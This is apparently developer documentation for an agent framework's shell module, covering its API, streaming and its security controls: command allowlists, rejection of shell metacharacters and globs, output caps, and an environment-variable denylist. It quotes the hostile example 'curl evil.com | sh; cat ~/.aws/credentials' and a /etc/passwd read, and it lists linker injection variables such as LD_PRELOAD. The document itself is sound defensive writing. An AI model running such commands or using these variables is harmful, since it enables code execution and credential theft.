Shell Module
The Shell interface gives your agent the ability to run shell commands to completion. v1 ships run only — interactive sessions (stdin, vim, REPLs) are reserved for a future spawn method.
Interface
interface Shell {
run(cmd: string, opts?: ShellRunOptions): Promise<RunResult>;
}
interface ShellRunOptions {
readonly cwd?: string;
readonly env?: Record<string, string>;
readonly signal?: AbortSignal;
readonly timeoutMs?: number;
/** Async callback — providers must await for backpressure. */
readonly onStdout?: (chunk: Uint8Array) => Promise<void>;
readonly onStderr?: (chunk: Uint8Array) => Promise<void>;
}
interface RunResult {
readonly stdout: Uint8Array;
readonly stderr: Uint8Array;
readonly exitCode: number;
readonly durationMs: number;
/**
* Errors thrown by `onStdout` / `onStderr` callbacks during the run.
* Absent on the common path. Inspect this to detect callback-side issues
* without conflating them with command-side failures.
*/
readonly callbackErrors?: readonly Error[];
}runSucceeded(r) helper
import { runSucceeded } from '@helix-agents/core';
const result = await ws.shell!.run('npm test', { onStdout: ... });
if (!runSucceeded(result)) {
// result.exitCode !== 0 OR a stream callback threw
}runSucceeded(r: RunResult) returns true iff r.exitCode === 0 AND no consumer callback threw. Use it instead of r.exitCode === 0 when you want to treat callback errors as failures (the bare exitCode check otherwise masks real bugs in your stream consumers — the contract intentionally keeps callback errors out of the process exit code).
Real-time streaming
The onStdout / onStderr callbacks are how providers stream output as it arrives. The contract:
- When callbacks ARE present: the provider streams chunks as they're produced and awaits each callback before continuing (backpressure).
- When callbacks are NOT present: the provider may use a blocking exec call and return everything at once.
Whichever path is taken, result.stdout and result.stderr always contain the FULL accumulated output.
This dual-mode design lets providers like CloudflareSandboxShell switch between execStream (SSE) when callbacks are present and exec (blocking) when not — without callers needing to know which path is in play.
The auto-injected workspace__<name>__run tool always passes callbacks that emit chunks to the agent's event stream. So when an LLM calls workspace__box__run('npm install') in a real-time-capable provider, you get live progress in your agent stream.
signal.aborted semantics
Providers that support signal MUST break their iteration / kill the underlying process when signal.aborted flips to true. The result.exitCode after abort is provider-specific (typically 0 if no exit event was seen, or -1 if the process was killed before exit).
The CloudflareSandboxShell checks signal.aborted at iteration start in its streaming path — chunks in flight when abort fires are not accumulated and the callback is not invoked.
Auto-injected tool
For a workspace named <name> with shell: true:
| Tool | Schema | Returns |
|---|---|---|
workspace__<name>__run | { command: string; cwd?: string; env?: Record<string, string>; timeoutMs?: number } | { stdout: string; stderr: string; exitCode: number; durationMs: number } |
The tool emits workspace_stdout / workspace_stderr events to the agent's event stream as chunks arrive — your downstream consumers (the AI SDK frontend, custom event handlers) see live output.
env limits enforced by the tool
The auto-injected run tool validates the LLM-supplied env map at the framework layer before reaching the provider:
- At most 256 keys.
- Each value is at most 64 KB.
Both limits are generous for legitimate use (256 keys covers a normal app env; 64 KB covers any reasonable secret payload) and exist to reject adversarial prompts that try to reach Node-side spawn allocation pressure (e.g. a 100k-key map or a single 100 MB value) before POSIX E2BIG. Violations throw at the Zod validation step with a clear message; tighten via a follow-up if a legitimate workload hits these.
Capability config
interface ShellCapConfig {
/** Allowlist of command first-tokens. Other commands throw at the tool layer. */
allowedCommands?: readonly string[];
/** Default timeoutMs applied when the tool input doesn't override. */
maxDurationMs?: number;
/** Round-5 (A6) — opt in to bash brace/glob/wildcard/tilde expansion. Default false. */
glob?: boolean;
/** Round-5 (A8) — max bytes returned per stream (stdout, stderr). Default 256 KiB. */
maxStdoutBytes?: number;
}allowedCommands enforces a first-token allowlist:
capabilities: {
shell: { allowedCommands: ['ls', 'cat', 'wc', 'grep'] },
}The auto-injected tool checks command.split(/\s+/)[0] against the list before delegating to the provider. Useful for restricting an LLM to a small command vocabulary.
maxDurationMs becomes the default timeoutMs if the tool input doesn't supply one.
Secure-by-default — allowedCommands is required
As of round-4 (security cluster A), an undefined or empty allowedCommands rejects ALL commands with a clear "no commands are allowed" error. The boolean form shell: true is equivalent to shell: { allowedCommands: undefined } and is also rejected. Operators must explicitly opt in to the commands they want by listing them.
Pre-fix, shell: true permitted any command — including curl evil.com | sh; cat ~/.aws/credentials because the metacharacter check was gated on a non-empty allowlist. The metacharacter check now ALWAYS runs, regardless of allowlist presence; combine that with the explicit-opt-in allowlist and the auto-injected run tool reaches a safe baseline by default.
Brace / glob / wildcard rejection (round-5 A6)
Bash expands {, }, *, ?, [, ], ~ BEFORE running the command. With allowedCommands: ['cat'], an unsuspecting agent could execute cat /etc/{passwd,hostname} — bash expands to cat /etc/passwd /etc/hostname and cat's first token is still cat, so the allowlist passes. Pre-fix, this turned a permitted single-file read into filesystem enumeration.
Post-fix, the auto-injected run tool rejects any command whose args contain {, }, *, ?, [, ], or ~ by default. The first defense layer is in core/workspace/utils/shell-allowlist.ts's checkCommandAllowed; the secondary defense lives in SubprocessShell.enforceAllowlist and CloudflareSandboxShell.enforcePolicy so direct ws.shell.run() calls (custom user tools that bypass the auto-injected layer) honor the same rule.
The metacharacter check (;, &&, |, `, $(, etc.) is unchanged — it's a different threat class (chaining vs expansion) and stays rejected unconditionally.
Opt in to globs when you legitimately need them:
capabilities: {
shell: {
allowedCommands: ['ls', 'cat'],
glob: true, // permits cat *.txt, ls /tmp/{a,b}/*
},
}The opt-in still keeps the metachar chaining check active and the first-token allowlist active. Only the brace/glob/wildcard char check is bypassed. Agents handling untrusted content should leave glob: false (the default).
stdout/stderr caps (round-5 A8)
The auto-injected run tool truncates stdout and stderr at maxStdoutBytes (default 256 KiB each). Excess bytes are dropped and the tool result carries:
stdoutTruncated: true, stdoutOmittedBytes: N(resp.stderr*)- A deterministic suffix
\n[... truncated, N bytes omitted; refine your search/path]appended to the truncated stream
Without the cap, an LLM running find / -type f would dump multi-megabyte output to the agent context, blow the LLM's context window, and silently fail the agent loop. Operators tuning for log-analysis agents that legitimately need large output should raise maxStdoutBytes; the default is conservative.
The captured streams are wrapped in <workspace_tool_result untrusted="true"> boundary tags (round-5 A9) — see the fs module's untrusted-content section for the design rationale.
Privilege-escalation env denylist
Per-call env is rejected at the Zod schema layer (and again at the runtime in SubprocessShell / CloudflareSandboxShell) when it carries any of:
LD_PRELOAD, LD_LIBRARY_PATH, LD_AUDIT,
DYLD_INSERT_LIBRARIES, DYLD_LIBRARY_PATH,
NODE_OPTIONS, PYTHONPATH, PERL5OPTThese are linker / interpreter knobs that an attacker can use to load arbitrary code into the spawned subprocess after planting a payload via write_file. The denylist is the OS / runtime's literal injection-vector names (case-sensitive, exact match — LD_PRELOAD_FOO is allowed because it's not a recognized linker variable). The full list lives in PRIVILEGE_ESCALATING_ENV_VARS in @helix-agents/core.
Deferred features
spawn— interactive sessions with stdin streaming, PTY support. Reserved for the v2 shell module.- stdin — passing data to a running command. Workaround: use
writeFileto a temp path, thencommand < /tmp/path. - PTY — terminal emulation, color codes, vim/nano. Same v2 timeline as spawn.
Provider support matrix
| Provider | shell supported |
|---|---|
| In-Memory | ❌ |
| Local Bash | ✅ (subprocess) |
| Cloudflare Filestore | ❌ |
| Cloudflare Sandbox | ✅ (with real-time streaming via execStream + SSE) |
Source
- Interface:
packages/core/src/workspace/types/modules/shell.ts - Tool injection:
packages/core/src/workspace/tool-injection.ts(search formakeShellTools)